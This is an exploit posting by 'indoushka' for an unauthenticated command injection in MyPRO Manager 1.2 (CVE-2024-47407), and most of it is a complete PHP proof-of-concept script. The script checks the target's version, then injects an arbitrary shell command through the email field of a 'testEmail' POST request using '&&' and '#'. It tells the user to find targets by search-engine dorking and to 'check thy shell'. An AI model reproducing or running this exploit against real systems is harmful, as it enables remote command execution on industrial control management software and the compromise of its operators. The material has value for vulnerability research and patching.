============================================================================================================================================= | # Title : MyPRO Manager 1.2 php code injection | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://www.myscada.org/mypro/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: MyPRO Manager versions 1.2 and below suffer from an unauthenticated command injection vulnerability. (Related : https://packetstorm.news/files/id/189175/ Related CVE numbers: CVE-2024-47407 ) . [+] save code as poc.php. [+] Set Target : line 79. [+] Usage : php poc.php [+] PayLoad : targetUri = $targetUri; } public function check() { try { $url = $this->targetUri . '/assets/index-Aup6jYxO.js'; $response = $this->sendRequest($url, 'GET'); if (preg_match('/const v="([^"]+)"/', $response, $matches)) { $version = $matches[1]; echo 'Version retrieved: ' . $version . "\n"; if (version_compare($version, '1.2', '<=')) { return "Appears vulnerable"; } return "Safe"; } } catch (Exception $e) { return "Unknown"; } return "Unknown"; } public function exploit($cmd) { $this->executeCommand($cmd); } private function executeCommand($cmd) { $this->execMyPROMgr($cmd); echo 'Exploit finished, check thy shell.' . "\n"; } private function execMyPROMgr($cmd) { $postData = [ 'command' => 'testEmail', 'email' => $this->generateRandomString(3, 12) . '@' . $this->generateRandomString(4, 8) . '.com&&' . $cmd . ' #' ]; $response = $this->sendRequest($this->targetUri . '/get', 'POST', json_encode($postData)); if ($response && $this->getHttpResponseCode($response) == 200) { echo 'Command successfully executed, check your shell.' . "\n"; } else { echo 'Unexpected or no reply received.' . "\n"; } } private function sendRequest($url, $method, $data = null) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($method === 'POST') { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']); } $response = curl_exec($ch); curl_close($ch); return $response; } private function generateRandomString($minLength, $maxLength) { $length = rand($minLength, $maxLength); return substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length); } private function getHttpResponseCode($response) { return substr($response, 9, 3); // Assuming response contains status code as the first 3 digits after HTTP/1.1 } } // Example usage $exploit = new MyPROManagerExploit('http://example.com'); $checkResult = $exploit->check(); echo $checkResult . "\n"; if ($checkResult == "Appears vulnerable") { $exploit->exploit('id'); // Exploit with a sample command like 'id' } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================